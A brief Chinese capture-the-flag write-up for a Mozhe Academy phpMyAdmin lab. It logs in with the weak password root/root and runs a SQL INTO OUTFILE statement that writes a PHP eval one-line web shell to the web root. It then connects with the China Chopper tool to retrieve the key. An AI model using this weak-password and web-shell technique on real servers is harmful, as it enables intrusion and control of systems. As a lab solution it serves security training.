墨者學院---phpMyAdmin後臺文件包含分析溯源--解題思路

進入後臺,使用弱口令嘗試登入 如admin~admin,root-root等 本題爲root-root 點到SQL,發現可以進行sql語句 select ‘<?php eval($_POST[giao]);?>’ into outfile ‘/var/www/html/2.php’ 3.執行成功 4.上菜刀 5.在根目錄可以找到本題所需要的key 在www/html目錄中可以找到寫入的一句話木馬
相關文章
相關標籤/搜索